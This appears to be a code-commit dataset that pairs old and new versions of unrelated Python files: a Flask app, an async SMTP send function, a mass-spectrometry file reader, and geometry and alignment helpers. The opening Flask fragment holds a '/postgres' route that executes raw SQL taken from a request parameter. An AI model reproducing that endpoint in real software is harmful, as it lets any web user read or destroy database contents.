fecha = clave
else:
return 'Not Implemented'
coso = jsonify({'date': fecha})
return coso
@app.route("/postgres")
def postgres():
query = request.args.get("query")
cursor = postgresdb.cursor()
cursor.execute(query)
results = [[a for a in result] for result in cursor]
print(results)
return render_template('postgres.html', results=results)
@app.route("/example")
def example():
return render_template('example.html')
if __name__ == "__main__":
app.run()
|
"""
Main public API.
"""
import ssl
from email.message import Message
from typing import Dict, Iterable, Optional, Tuple, Union, overload
from .compat import get_running_loop
from .connection import DEFAULT_TIMEOUT
from .response import SMTPResponse
from .smtp import SMTP
__all__ = ("send",)
@overload
async def send(
message: Message,
sender: Optional[str] = None,
recipients: Optional[Union[str, Iterable[str]]] = None,
hostname: Optional[str] = None,
port: Optional[int] = None,
username: Optional[str] = None,
password: Optional[str] = None,
mail_options: Optional[Iterable[str]] = None,
rcpt_options: Optional[Iterable[str]] = None,
timeout: Optional[float] = DEFAULT_TIMEOUT,
source_address: Optional[str] = None,
use_tls: bool = False,
start_tls: bool = False,
validate_certs: bool = True,
client_cert: Optional[str] = None,
client_key: Optional[str] = None,
tls_context: Optional[ssl.SSLContext] = None,
cert_bundle: Optional[str] = None,
) -> Tuple[Dict[str, SMTPResponse], str]:
pass
@overload # NOQA: F811
async def send(
message: Union[str, bytes],
sender: str = "",
recipients: Union[str, Iterable[str]] = "",
hostname: Optional[str] = None,
port: Optional[int] = None,
username: Optional[str] = None,
password: Optional[str] = None,
mail_options: Optional[Iterable[str]] = None,
rcpt_options: Optional[Iterable[str]] = None,
timeout: Optional[float] = DEFAULT_TIMEOUT,
source_address: Optional[str] = None,
use_tls: bool = False,
start_tls: bool = False,
validate_certs: bool = True,
client_cert: Optional[str] = None,
client_key: Optional[str] = None,
tls_context: Optional[ssl.SSLContext] = None,
cert_bundle: Optional[str] = None,
) -> Tuple[Dict[str, SMTPResponse], str]:
pass
async def send( # NOQA: F811
message,
sender=None,
recipients=None,
username=None,
password=None,
start_tls=False,
port=None,
use_tls=False,
**kwargs
):
"""
Send an email message. On await, connects to the SMTP server using the details
provided, sends the message, then disconnects.
:param message: Message text. Either an :py:class:`email.message.Message`
object, ``str`` or ``bytes``. If an :py:class:`email.message.Message` object is
provided, sender and recipients set in the message headers will be used, unless
overridden by the respective keyword arguments.
:keyword sender: From email address. Not required if an
:py:class:`email.message.Message` object is provided for the `message` argument.
:keyword recipients: Recipient email addresses. Not required if an
:py:class:`email.message.Message` object is provided for the `message` argument.
:keyword hostname: Server name (or IP) to connect to. Defaults to "localhost".
:keyword port: Server port. Defaults ``465`` if ``use_tls`` is ``True``,
``587`` if ``start_tls`` is ``True``, or ``25`` otherwise.
:keyword username: Username to login as after connect.
:keyword password: Password for login after connect.
:keyword source_address: The hostname of the client. Defaults to the
result of :py:func:`socket.getfqdn`. Note that this call blocks.
:keyword timeout: Default timeout value for the connection, in seconds.
Defaults to 60.
:keyword use_tls: If True, make the initial connection to the server
over TLS/SSL. Note that if the server supports STARTTLS only, this
should be False.
:keyword start_tls: If True, make the initial connection to the server
over plaintext, and then upgrade the connection to TLS/SSL. Not
compatible with use_tls.
:keyword validate_certs: Determines if server certificates are
validated. Defaults to True.
:keyword client_cert: Path to client side certificate, for TLS.
:keyword client_key: Path to client side key, for TLS.
:keyword tls_context: An existing :py:class:`ssl.SSLContext`, for TLS.
Mutually exclusive with ``client_cert``/``client_key``.
:keyword cert_bundle: Path to certificate bundle, for TLS verification.
:raises ValueError: required arguments missing or mutually exclusive options
provided
"""
if not isinstance(message, Message):
if not recipients:
raise ValueError("Recipients must be provided with raw messages.")
if not sender:
raise ValueError("Sender must be provided with raw messages.")
loop = get_running_loop()
client = SMTP(
loop=loop,
port=port,
username=username,
password=password,
use_tls=use_tls,
start_tls=start_tls,
**kwargs
)
async with client:
if isinstance(message, Message):
result = await client.send_message(
message, sender=sender, recipients=recipients
)
else:
result = await client.sendmail(sender, recipients, message)
return result
Type overloads don't need kwarg defaults
"""
Main public API.
"""
import ssl
from email.message import Message
from typing import Dict, Iterable, Optional, Tuple, Union, overload
from .compat import get_running_loop
from .response import SMTPResponse
from .smtp import SMTP
__all__ = ("send",)
@overload
async def send(
message: Message,
sender: Optional[str] = ...,
recipients: Optional[Union[str, Iterable[str]]] = ...,
hostname: Optional[str] = ...,
port: Optional[int] = ...,
username: Optional[str] = ...,
password: Optional[str] = ...,
mail_options: Optional[Iterable[str]] = ...,
rcpt_options: Optional[Iterable[str]] = ...,
timeout: Optional[float] = ...,
source_address: Optional[str] = ...,
use_tls: bool = ...,
start_tls: bool = ...,
validate_certs: bool = ...,
client_cert: Optional[str] = ...,
client_key: Optional[str] = ...,
tls_context: Optional[ssl.SSLContext] = ...,
cert_bundle: Optional[str] = ...,
) -> Tuple[Dict[str, SMTPResponse], str]:
...
@overload # NOQA: F811
async def send(
message: Union[str, bytes],
sender: str = ...,
recipients: Union[str, Iterable[str]] = ...,
hostname: Optional[str] = ...,
port: Optional[int] = ...,
username: Optional[str] = ...,
password: Optional[str] = ...,
mail_options: Optional[Iterable[str]] = ...,
rcpt_options: Optional[Iterable[str]] = ...,
timeout: Optional[float] = ...,
source_address: Optional[str] = ...,
use_tls: bool = ...,
start_tls: bool = ...,
validate_certs: bool = ...,
client_cert: Optional[str] = ...,
client_key: Optional[str] = ...,
tls_context: Optional[ssl.SSLContext] = ...,
cert_bundle: Optional[str] = ...,
) -> Tuple[Dict[str, SMTPResponse], str]:
...
async def send( # NOQA: F811
message,
sender=None,
recipients=None,
username=None,
password=None,
start_tls=False,
port=None,
use_tls=False,
**kwargs
):
"""
Send an email message. On await, connects to the SMTP server using the details
provided, sends the message, then disconnects.
:param message: Message text. Either an :py:class:`email.message.Message`
object, ``str`` or ``bytes``. If an :py:class:`email.message.Message` object is
provided, sender and recipients set in the message headers will be used, unless
overridden by the respective keyword arguments.
:keyword sender: From email address. Not required if an
:py:class:`email.message.Message` object is provided for the `message` argument.
:keyword recipients: Recipient email addresses. Not required if an
:py:class:`email.message.Message` object is provided for the `message` argument.
:keyword hostname: Server name (or IP) to connect to. Defaults to "localhost".
:keyword port: Server port. Defaults ``465`` if ``use_tls`` is ``True``,
``587`` if ``start_tls`` is ``True``, or ``25`` otherwise.
:keyword username: Username to login as after connect.
:keyword password: Password for login after connect.
:keyword source_address: The hostname of the client. Defaults to the
result of :py:func:`socket.getfqdn`. Note that this call blocks.
:keyword timeout: Default timeout value for the connection, in seconds.
Defaults to 60.
:keyword use_tls: If True, make the initial connection to the server
over TLS/SSL. Note that if the server supports STARTTLS only, this
should be False.
:keyword start_tls: If True, make the initial connection to the server
over plaintext, and then upgrade the connection to TLS/SSL. Not
compatible with use_tls.
:keyword validate_certs: Determines if server certificates are
validated. Defaults to True.
:keyword client_cert: Path to client side certificate, for TLS.
:keyword client_key: Path to client side key, for TLS.
:keyword tls_context: An existing :py:class:`ssl.SSLContext`, for TLS.
Mutually exclusive with ``client_cert``/``client_key``.
:keyword cert_bundle: Path to certificate bundle, for TLS verification.
:raises ValueError: required arguments missing or mutually exclusive options
provided
"""
if not isinstance(message, Message):
if not recipients:
raise ValueError("Recipients must be provided with raw messages.")
if not sender:
raise ValueError("Sender must be provided with raw messages.")
loop = get_running_loop()
client = SMTP(
loop=loop,
port=port,
username=username,
password=password,
use_tls=use_tls,
start_tls=start_tls,
**kwargs
)
async with client:
if isinstance(message, Message):
result = await client.send_message(
message, sender=sender, recipients=recipients
)
else:
result = await client.sendmail(sender, recipients, message)
return result
|
from aston import Datafile
import struct
import numpy as np
class BrukerMSMS(Datafile.Datafile):
ext = 'AMI'
mgc = None
def __init__(self, *args, **kwargs):
super(BrukerMSMS, self).__init__(*args, **kwargs)
#def _getTotalTrace(self):
# pass
def _cacheData(self):
if self.data is not None:
return
# rd(f,'ii'); plt.plot(range(3000), rd(f,3000*'d')-1.2*range(3000))
f = open(self.rawdata, 'rb')
rd = lambda f, st: struct.unpack(st, f.read(struct.calcsize(st)))
recs = rd(f, 'ii')[1]
self.data = np.zeros((recs, 2))
times = rd(f, recs * 'd')
self.data[:, 0] = np.array(times) / 60
ions = set()
rd(f, 'i') # number of data points again
for i in range(recs):
n_pts = rd(f, 'i')[0]
ions.update(rd(f, n_pts * 'f'))
rd(f, 'i') # number of pts in spectra again
abun = rd(f, n_pts * 'f')
#self.data[i, 0] = times[i] / 60
self.data[i, 1] = sum(abun)
print(sorted(ions)[:20])
f.close()
self.ions = [1]
def _updateInfoFromFile(self):
d = {}
d['r-type'] = 'Sample'
self.info.update(d)
BrukerMSMS now has individual ions.
from aston import Datafile
import struct
import numpy as np
import scipy.sparse
class BrukerMSMS(Datafile.Datafile):
ext = 'AMI'
mgc = None
def __init__(self, *args, **kwargs):
super(BrukerMSMS, self).__init__(*args, **kwargs)
#def _getTotalTrace(self):
# pass
def _cacheData(self):
if self.data is not None:
return
# convenience function for reading in data
rd = lambda f, st: struct.unpack(st, f.read(struct.calcsize(st)))
# open the file
f = open(self.rawdata, 'rb')
nscans = rd(f, 'ii')[1]
if nscans == 0:
self.ions = []
self.data = None
return
times = np.array(rd(f, nscans * 'd')) / 60.0
f.seek(f.tell() + 4) # number of scans again
# set up the array of column indices
indptr = np.empty(nscans + 1, dtype=int)
indptr[0] = 0
# figure out the total number of points
dpos = f.tell()
tot_pts = 0
for scn in range(nscans):
npts = rd(f, 'i')[0]
#rd(f, npts * 'f' + 'i' + n_pts * 'f')
f.seek(f.tell() + 8 * npts + 4)
tot_pts += npts + 1
indptr[scn + 1] = tot_pts
f.seek(dpos)
self.ions = []
i_lkup = {}
idxs = np.empty(tot_pts, dtype=int)
vals = np.empty(tot_pts, dtype=float)
for scn in range(nscans):
npts = rd(f, 'i')[0]
rd_ions = rd(f, npts * 'f')
f.seek(f.tell() + 4) # number of points again
abun = rd(f, npts * 'f')
nions = set([int(i) for i in rd_ions \
if int(i) not in i_lkup])
i_lkup.update(dict((ion, i + len(self.ions)) \
for i, ion in enumerate(nions)))
self.ions += nions
idxs[indptr[scn]:indptr[scn + 1]] = \
[-1] + [i_lkup[int(i)] for i in rd_ions]
vals[indptr[scn]:indptr[scn + 1]] = \
(times[scn],) + abun
idxs += 1
self.data = scipy.sparse.csr_matrix((vals, idxs, indptr), \
shape=(nscans, len(self.ions) + 1), \
dtype=float)
#self.data = np.zeros((recs, 2))
#times = rd(f, nscans * 'd')
#self.data[:, 0] = np.array(times) / 60
#ions = set()
#rd(f, 'i') # number of data points again
#for i in range(nscans):
# n_pts = rd(f, 'i')[0]
# ions.update(rd(f, n_pts * 'f'))
# rd(f, 'i') # number of pts in spectra again
# abun = rd(f, n_pts * 'f')
# #self.data[i, 0] = times[i] / 60
# self.data[i, 1] = sum(abun)
#f.close()
#self.ions = [1]
def _updateInfoFromFile(self):
d = {}
d['r-type'] = 'Sample'
self.info.update(d)
|
''' Helper functions for geometrical operations.
'''
from __future__ import division
import logging
import tables as tb
import numpy as np
def get_plane_normal(direction_vector_1, direction_vector_2):
''' Normal vector of a plane.
Plane is define by two non parallel direction vectors within the plane.
Parameters
----------
direction_vector_1 : array
Array with x, y and z.
direction_vector_2 : array
Array with x, y and z.
Returns
-------
Array with x, y and z.
'''
return np.cross(direction_vector_1, direction_vector_2)
def get_line_intersections_with_plane(line_origins, line_directions,
position_plane, normal_plane):
''' Calculates the intersection of n lines with one plane.
If there is no intersection point (line is parallel to plane or the line is
in the plane) the intersection point is set to nan.
Notes
-----
Further information:
http://stackoverflow.com/questions/4938332/line-plane-intersection-based-on-points
Parameters
----------
line_origins : array
A point (x, y and z) on the line for each of the n lines.
line_directions : array
The direction vector of the line for n lines.
position_plane : array
A array (x, y and z) to the plane.
normal_plane : array
The normal vector (x, y and z) of the plane.
Returns
-------
Array with shape (n, 3) with the intersection point.
'''
# Calculate offsets and extend in missing dimension
offsets = position_plane[np.newaxis, :] - line_origins
# Precalculate to be able to avoid division by 0
# (line is parallel to the plane or in the plane)
norm_dot_off = np.dot(normal_plane, offsets.T)
# Dot product is transformed to be at least 1D for special n = 1
norm_dot_dir = np.atleast_1d(np.dot(normal_plane,
line_directions.T))
# Initialize result to nan
t = np.full_like(norm_dot_off, fill_value=np.nan)
# Warn if some intersection cannot be calculated
if np.any(norm_dot_dir == 0):
logging.warning('Some line plane intersection could not be calculated')
# Calculate t scalar for each line simultaniously, avoid division by 0
sel = norm_dot_dir != 0
t[sel] = norm_dot_off[sel] / norm_dot_dir[sel]
# Calculate the intersections for each line with the plane
intersections = line_origins + line_directions * t[:, np.newaxis]
return intersections
def cartesian_to_spherical(x, y, z):
''' Does a transformation from cartesian to spherical coordinates.
Convention: r = 0 --> phi = theta = 0
Parameters
----------
x, y, z : float
Position in cartesian space.
Returns
-------
Spherical coordinates phi, theta and r.
'''
r = np.sqrt(x * x + y * y + z * z)
phi = np.zeros_like(r) # define phi = 0 for x = 0
theta = np.zeros_like(r) # theta = 0 for r = 0
# Avoid division by zero
# https://en.wikipedia.org/wiki/Atan2
phi[x != 0] = np.arctan2(y[x != 0], x[x != 0])
phi[phi < 0] += 2. * np.pi # map to phi = [0 .. 2 pi[
theta[r != 0] = np.arccos(z[r != 0] / r[r != 0])
return phi, theta, r
def spherical_to_cartesian(phi, theta, r):
''' Transformation from spherical to cartesian coordinates.
Including error checks.
Parameters
----------
phi, theta, r : float
Position in spherical space.
Returns
-------
Cartesian coordinates x, y and z.
'''
if np.any(r < 0):
raise RuntimeError(
'Conversion from spherical to cartesian coordinates failed, '
'because r < 0')
if np.any(theta < 0) or np.any(theta >= np.pi):
raise RuntimeError(
'Conversion from spherical to cartesian coordinates failed, '
'because theta exceeds [0, Pi[')
if np.any(phi < 0) or np.any(phi >= 2 * np.pi):
raise RuntimeError(
'Conversion from spherical to cartesian coordinates failed, '
'because phi exceeds [0, 2*Pi[')
x = r * np.cos(phi) * np.sin(theta)
y = r * np.sin(phi) * np.sin(theta)
z = r * np.cos(theta)
return x, y, z
def rotation_matrix_x(angle):
''' Calculates the rotation matrix for the rotation around the x axis by an angle alpha in a cartesian right-handed coordinate system.
Note
----
Rotation in a cartesian right-handed coordinate system.
Parameters
----------
alpha : float
Angle in radians.
Returns
-------
Array with shape (3, 3).
'''
return np.array([[1, 0, 0],
[0, np.cos(angle), np.sin(angle)],
[0, -np.sin(angle), np.cos(angle)]])
def rotation_matrix_y(angle):
''' Calculates the rotation matrix for the rotation around the y axis by an angle beta in a cartesian right-handed coordinate system.
Note
----
Rotation in a cartesian right-handed coordinate system.
Parameters
----------
beta : float
Angle in radians.
Returns
-------
Array with shape (3, 3).
'''
return np.array([[np.cos(angle), 0, - np.sin(angle)],
[0, 1, 0],
[np.sin(angle), 0, np.cos(angle)]])
def rotation_matrix_z(angle):
''' Calculates the rotation matrix for the rotation around the z axis by an angle gamma in a cartesian right-handed coordinate system.
Note
----
Rotation in a cartesian right-handed coordinate system.
Parameters
----------
gamma : float
Angle in radians.
Returns
-------
Array with shape (3, 3).
'''
return np.array([[np.cos(angle), np.sin(angle), 0],
[-np.sin(angle), np.cos(angle), 0],
[0, 0, 1]])
def rotation_matrix(alpha, beta, gamma):
''' Calculates the rotation matrix for the rotation around the three cartesian axis x, y, z in a right-handed system.
Note
----
In a right-handed system. The rotation is done around x then y then z.
Remember:
- Transform to the locale coordinate system before applying rotations
- Rotations are associative but not commutative
Usage
-----
A rotation by (alpha, beta, gamma) of the vector (x, y, z) in the local
coordinate system can be done by:
np.dot(rotation_matrix(alpha, beta, gamma), np.array([x, y, z]))
Parameters
----------
alpha : float
Angle in radians for rotation around x.
beta : float
Angle in radians for rotation around y.
gamma : float
Angle in radians for rotation around z.
Returns
-------
Array with shape (3, 3).
'''
return np.dot(rotation_matrix_x(alpha),
np.dot(rotation_matrix_y(beta), rotation_matrix_z(gamma)))
def translation_matrix(x, y, z):
''' Calculates the translation matrix for the translation in x, y, z in a cartesian right-handed system.
Note
----
Remember: Translations are associative and commutative
Usage
-----
A translation of a vector (x, y, z) by dx, dy, dz can be done by:
np.dot(translation_matrix(dx, dy, dz), np.array([x, y, z, 1]))
Parameters
----------
x : float
Translation in x.
y : float
Translation in y.
z : float
Translation in z.
Returns
-------
Array with shape (4, 4).
'''
translation_matrix = np.eye(4, 4, 0)
translation_matrix[3, :3] = np.array([x, y, z])
return translation_matrix.T
def global_to_local_transformation_matrix(x, y, z, alpha, beta, gamma):
''' Transformation matrix that applies a translation and rotation.
Translation is T=(-x, -y, -z) to the local coordinate system followed
by a rotation = R(alpha, beta, gamma).T in the local coordinate system.
Note
----
- This function is the inverse of
local_to_global_transformation_matrix()
- The resulting transformation matrix is 4 x 4
- Translation and Rotation operations are not commutative
Parameters
----------
x : float
Translation in x.
y : float
Translation in y.
z : float
Translation in z.
alpha : float
Angle in radians for rotation around x.
beta : float
Angle in radians for rotation around y.
gamma : float
Angle in radians for rotation around z.
Returns
-------
Array with shape (4, 4).
'''
# Extend rotation matrix R by one dimension
R = np.eye(4, 4, 0)
R[:3, :3] = rotation_matrix(alpha, beta, gamma).T
# Get translation matrix T
T = translation_matrix(-x, -y, -z)
return np.dot(R, T)
def local_to_global_transformation_matrix(x, y, z, alpha, beta, gamma):
''' Transformation matrix that applies a inverse translation and rotation.
Inverse rotation in the local coordinate system followed by an inverse
translation by x, y, z to the global coordinate system.
Note
----
- The resulting transformation matrix is 4 x 4
- Translation and Rotation operations do not commutative
Parameters
----------
x : float
Translation in x.
y : float
Translation in y.
z : float
Translation in z.
alpha : float
Angle in radians for rotation around x.
beta : float
Angle in radians for rotation around y.
gamma : float
Angle in radians for rotation around z.
Returns
-------
Array with shape (4, 4).
'''
# Extend inverse rotation matrix R by one dimension
R = np.eye(4, 4, 0)
R[:3, :3] = rotation_matrix(alpha, beta, gamma)
# Get inverse translation matrix T
T = translation_matrix(x, y, z)
return np.dot(T, R)
def apply_transformation_matrix(x, y, z, transformation_matrix):
''' Takes arrays for x, y, z and applies a transformation matrix (4 x 4).
Parameters
----------
x : array
Array of x coordinates.
y : array
Array of y coordinates.
z : array
Array of z coordinates.
Returns
-------
Array with transformed coordinates.
'''
# Add extra 4th dimension
pos = np.column_stack((x, y, z, np.ones_like(x))).T
# Transform and delete extra dimension
pos_T = np.dot(transformation_matrix, pos).T[:, :-1]
return pos_T[:, 0], pos_T[:, 1], pos_T[:, 2]
def apply_rotation_matrix(x, y, z, rotation_matrix):
''' Takes array in x, y, z and applies a rotation matrix (3 x 3).
Parameters
----------
x : array
Array of x coordinates.
y : array
Array of x coordinates.
z : array
Array of x coordinates.
Returns
-------
Array with rotated coordinates.
'''
pos = np.column_stack((x, y, z)).T
pos_T = np.dot(rotation_matrix, pos).T
return pos_T[:, 0], pos_T[:, 1], pos_T[:, 2]
def apply_alignment(hits_x, hits_y, hits_z, dut_index, alignment=None,
prealignment=None, inverse=False):
''' Takes hits and applies a transformation according to the alignment data.
If alignment data with rotations and translations are given the hits are
transformed according to the rotations and translations.
If pre-alignment data with offsets and slopes are given the hits are
transformed according to the slopes and offsets.
If both are given alignment data is taken.
The transformation can be inverted.
Parameters
---------
hits_x, hits_y, hits_z : array
Array with corresponding hit positions.
dut_index : int
Needed to select the corrct alignment info.
alignment : array
Alignment information with rotations and translations.
prealignment : array
Pre-alignment information with offsets and slopes.
inverse : bool
Apply inverse transformation if True.
Returns
-------
hits_x, hits_y, hits_z : array
Array with transformed hit positions.
'''
if (alignment is None and prealignment is None) or \
(alignment is not None and prealignment is not None):
raise RuntimeError('Neither pre-alignment or alignment data given.')
if alignment is not None:
if inverse:
logging.debug('Transform hit position into the local coordinate '
'system using alignment data')
transformation_matrix = global_to_local_transformation_matrix(
x=alignment[dut_index]['translation_x'],
y=alignment[dut_index]['translation_y'],
z=alignment[dut_index]['translation_z'],
alpha=alignment[dut_index]['alpha'],
beta=alignment[dut_index]['beta'],
gamma=alignment[dut_index]['gamma'])
else:
logging.debug('Transform hit position into the global coordinate '
'system using alignment data')
transformation_matrix = local_to_global_transformation_matrix(
x=alignment[dut_index]['translation_x'],
y=alignment[dut_index]['translation_y'],
z=alignment[dut_index]['translation_z'],
alpha=alignment[dut_index]['alpha'],
beta=alignment[dut_index]['beta'],
gamma=alignment[dut_index]['gamma'])
hits_x, hits_y, hits_z = apply_transformation_matrix(
x=hits_x,
y=hits_y,
z=hits_z,
transformation_matrix=transformation_matrix)
else:
c0_column = prealignment[dut_index]['column_c0']
c1_column = prealignment[dut_index]['column_c1']
c0_row = prealignment[dut_index]['row_c0']
c1_row = prealignment[dut_index]['row_c1']
z = prealignment[dut_index]['z']
if inverse:
logging.debug('Transform hit position into the local coordinate '
'system using pre-alignment data')
hits_x = (hits_x - c0_column) / c1_column
hits_y = (hits_y - c0_row) / c1_row
hits_z -= z
else:
logging.debug('Transform hit position into the global coordinate '
'system using pre-alignment data')
hits_x = (c1_column * hits_x + c0_column)
hits_y = (c1_row * hits_y + c0_row)
hits_z += z
return hits_x, hits_y, hits_z
def merge_alignment_parameters(old_alignment, new_alignment, mode='relative',
select_duts=None):
if select_duts is None: # Select all DUTs
dut_sel = np.ones(old_alignment.shape[0], dtype=np.bool)
else:
dut_sel = np.zeros(old_alignment.shape[0], dtype=np.bool)
dut_sel[np.array(select_duts)] = True
# Do not change input parameters
alig_pars = old_alignment.copy()
if mode == 'absolute':
logging.info('Set alignment')
alig_pars[dut_sel] = new_alignment[dut_sel]
return alig_pars
elif mode == 'relative':
logging.info('Merge new alignment with old alignment')
alig_pars['translation_x'][dut_sel] += new_alignment[
'translation_x'][dut_sel]
alig_pars['translation_y'][dut_sel] += new_alignment[
'translation_y'][dut_sel]
alig_pars['translation_z'][dut_sel] += new_alignment[
'translation_z'][dut_sel]
alig_pars['alpha'][dut_sel] += new_alignment['alpha'][dut_sel]
alig_pars['beta'][dut_sel] += new_alignment['beta'][dut_sel]
alig_pars['gamma'][dut_sel] += new_alignment['gamma'][dut_sel]
# TODO: Is this always a good idea? Usually works, but what if one
# heavily tilted device?
# All alignments are relative, thus center them around 0 by
# substracting the mean (exception: z position)
if np.count_nonzero(dut_sel) > 1:
alig_pars['alpha'][dut_sel] -= np.mean(alig_pars['alpha'][dut_sel])
alig_pars['beta'][dut_sel] -= np.mean(alig_pars['beta'][dut_sel])
alig_pars['gamma'][dut_sel] -= np.mean(alig_pars['gamma'][dut_sel])
alig_pars['translation_x'][dut_sel] -= np.mean(alig_pars[
'translation_x'][dut_sel])
alig_pars['translation_y'][dut_sel] -= np.mean(alig_pars[
'translation_y'][dut_sel])
return alig_pars
else:
raise RuntimeError('Unknown mode %s', str(mode))
def store_alignment_parameters(alignment_file, alignment_parameters,
mode='absolute', select_duts=None):
''' Stores alignment parameters (rotations, translations) into file.
Absolute (overwriting) and relative (add angles, translations) supported.
Parameters
---------
alignment_file : string
The pytables file name containing the alignment.
alignment_parameters : recarray
An array with the alignment values.
mode : string
Select relative or absolute alignment. The strings 'relative' and 'absolute' are supported.
use_duts : iterable
In relative mode only change specified DUTs.
'''
description = np.zeros((1,), dtype=alignment_parameters.dtype).dtype
# Open file with alignment data
with tb.open_file(alignment_file, mode="r+") as out_file:
try:
align_tab = out_file.create_table(out_file.root, name='Alignment',
title='Table containing the '
'alignment geometry parameters '
'(translations and rotations)',
description=description,
filters=tb.Filters(
complib='blosc',
complevel=5,
fletcher32=False))
align_tab.append(alignment_parameters)
except tb.NodeError:
align_pars = merge_alignment_parameters(
old_alignment=out_file.root.Alignment[:],
new_alignment=alignment_parameters,
mode=mode,
select_duts=select_duts)
logging.info('Overwrite existing alignment!')
# Remove old node, is there a better way?
out_file.root.Alignment._f_remove()
align_tab = out_file.create_table(out_file.root, name='Alignment',
title='Table containing the '
'alignment geometry parameters '
'(translations and rotations)',
description=description,
filters=tb.Filters(
complib='blosc',
complevel=5,
fletcher32=False))
align_tab.append(align_pars)
string = "\n".join(['DUT%d: alpha=%1.4f, beta=%1.4f, gamma=%1.4f Rad, '
'x/y/z=%d/%d/%d um' % (dut_values['DUT'],
dut_values['alpha'],
dut_values['beta'],
dut_values['gamma'],
dut_values['translation_x'],
dut_values['translation_y'],
dut_values['translation_z'])
for dut_values in align_pars])
logging.info('Set alignment parameters to:\n%s' % string)
MAINT: cleanup
''' Helper functions for geometrical operations.
'''
from __future__ import division
import logging
import tables as tb
import numpy as np
def get_plane_normal(direction_vector_1, direction_vector_2):
''' Normal vector of a plane.
Plane is define by two non parallel direction vectors within the plane.
Parameters
----------
direction_vector_1 : array
Array with x, y and z.
direction_vector_2 : array
Array with x, y and z.
Returns
-------
Array with x, y and z.
'''
return np.cross(direction_vector_1, direction_vector_2)
def get_line_intersections_with_plane(line_origins, line_directions,
position_plane, normal_plane):
''' Calculates the intersection of n lines with one plane.
If there is no intersection point (line is parallel to plane or the line is
in the plane) the intersection point is set to nan.
Notes
-----
Further information:
http://stackoverflow.com/questions/4938332/line-plane-intersection-based-on-points
Parameters
----------
line_origins : array
A point (x, y and z) on the line for each of the n lines.
line_directions : array
The direction vector of the line for n lines.
position_plane : array
A array (x, y and z) to the plane.
normal_plane : array
The normal vector (x, y and z) of the plane.
Returns
-------
Array with shape (n, 3) with the intersection point.
'''
# Calculate offsets and extend in missing dimension
offsets = position_plane[np.newaxis, :] - line_origins
# Precalculate to be able to avoid division by 0
# (line is parallel to the plane or in the plane)
norm_dot_off = np.dot(normal_plane, offsets.T)
# Dot product is transformed to be at least 1D for special n = 1
norm_dot_dir = np.atleast_1d(np.dot(normal_plane,
line_directions.T))
# Initialize result to nan
t = np.full_like(norm_dot_off, fill_value=np.nan)
# Warn if some intersection cannot be calculated
if np.any(norm_dot_dir == 0):
logging.warning('Some line plane intersection could not be calculated')
# Calculate t scalar for each line simultaniously, avoid division by 0
sel = norm_dot_dir != 0
t[sel] = norm_dot_off[sel] / norm_dot_dir[sel]
# Calculate the intersections for each line with the plane
intersections = line_origins + line_directions * t[:, np.newaxis]
return intersections
def cartesian_to_spherical(x, y, z):
''' Does a transformation from cartesian to spherical coordinates.
Convention: r = 0 --> phi = theta = 0
Parameters
----------
x, y, z : float
Position in cartesian space.
Returns
-------
Spherical coordinates phi, theta and r.
'''
r = np.sqrt(x * x + y * y + z * z)
phi = np.zeros_like(r) # define phi = 0 for x = 0
theta = np.zeros_like(r) # theta = 0 for r = 0
# Avoid division by zero
# https://en.wikipedia.org/wiki/Atan2
phi[x != 0] = np.arctan2(y[x != 0], x[x != 0])
phi[phi < 0] += 2. * np.pi # map to phi = [0 .. 2 pi[
theta[r != 0] = np.arccos(z[r != 0] / r[r != 0])
return phi, theta, r
def spherical_to_cartesian(phi, theta, r):
''' Transformation from spherical to cartesian coordinates.
Including error checks.
Parameters
----------
phi, theta, r : float
Position in spherical space.
Returns
-------
Cartesian coordinates x, y and z.
'''
if np.any(r < 0):
raise RuntimeError('Conversion from spherical to cartesian coordinates failed, because r < 0')
if np.any(theta < 0) or np.any(theta >= np.pi):
raise RuntimeError('Conversion from spherical to cartesian coordinates failed, because theta exceeds [0, Pi[')
if np.any(phi < 0) or np.any(phi >= 2 * np.pi):
raise RuntimeError('Conversion from spherical to cartesian coordinates failed, because phi exceeds [0, 2*Pi[')
x = r * np.cos(phi) * np.sin(theta)
y = r * np.sin(phi) * np.sin(theta)
z = r * np.cos(theta)
return x, y, z
def rotation_matrix_x(angle):
''' Calculates the rotation matrix for the rotation around the x axis by an angle alpha in a cartesian right-handed coordinate system.
Note
----
Rotation in a cartesian right-handed coordinate system.
Parameters
----------
alpha : float
Angle in radians.
Returns
-------
Array with shape (3, 3).
'''
return np.array([[1, 0, 0],
[0, np.cos(angle), np.sin(angle)],
[0, -np.sin(angle), np.cos(angle)]])
def rotation_matrix_y(angle):
''' Calculates the rotation matrix for the rotation around the y axis by an angle beta in a cartesian right-handed coordinate system.
Note
----
Rotation in a cartesian right-handed coordinate system.
Parameters
----------
beta : float
Angle in radians.
Returns
-------
Array with shape (3, 3).
'''
return np.array([[np.cos(angle), 0, - np.sin(angle)],
[0, 1, 0],
[np.sin(angle), 0, np.cos(angle)]])
def rotation_matrix_z(angle):
''' Calculates the rotation matrix for the rotation around the z axis by an angle gamma in a cartesian right-handed coordinate system.
Note
----
Rotation in a cartesian right-handed coordinate system.
Parameters
----------
gamma : float
Angle in radians.
Returns
-------
Array with shape (3, 3).
'''
return np.array([[np.cos(angle), np.sin(angle), 0],
[-np.sin(angle), np.cos(angle), 0],
[0, 0, 1]])
def rotation_matrix(alpha, beta, gamma):
''' Calculates the rotation matrix for the rotation around the three cartesian axis x, y, z in a right-handed system.
Note
----
In a right-handed system. The rotation is done around x then y then z.
Remember:
- Transform to the locale coordinate system before applying rotations
- Rotations are associative but not commutative
Usage
-----
A rotation by (alpha, beta, gamma) of the vector (x, y, z) in the local
coordinate system can be done by:
np.dot(rotation_matrix(alpha, beta, gamma), np.array([x, y, z]))
Parameters
----------
alpha : float
Angle in radians for rotation around x.
beta : float
Angle in radians for rotation around y.
gamma : float
Angle in radians for rotation around z.
Returns
-------
Array with shape (3, 3).
'''
return np.dot(rotation_matrix_x(alpha),
np.dot(rotation_matrix_y(beta), rotation_matrix_z(gamma)))
def translation_matrix(x, y, z):
''' Calculates the translation matrix for the translation in x, y, z in a cartesian right-handed system.
Note
----
Remember: Translations are associative and commutative
Usage
-----
A translation of a vector (x, y, z) by dx, dy, dz can be done by:
np.dot(translation_matrix(dx, dy, dz), np.array([x, y, z, 1]))
Parameters
----------
x : float
Translation in x.
y : float
Translation in y.
z : float
Translation in z.
Returns
-------
Array with shape (4, 4).
'''
translation_matrix = np.eye(4, 4, 0)
translation_matrix[3, :3] = np.array([x, y, z])
return translation_matrix.T
def global_to_local_transformation_matrix(x, y, z, alpha, beta, gamma):
''' Transformation matrix that applies a translation and rotation.
Translation is T=(-x, -y, -z) to the local coordinate system followed
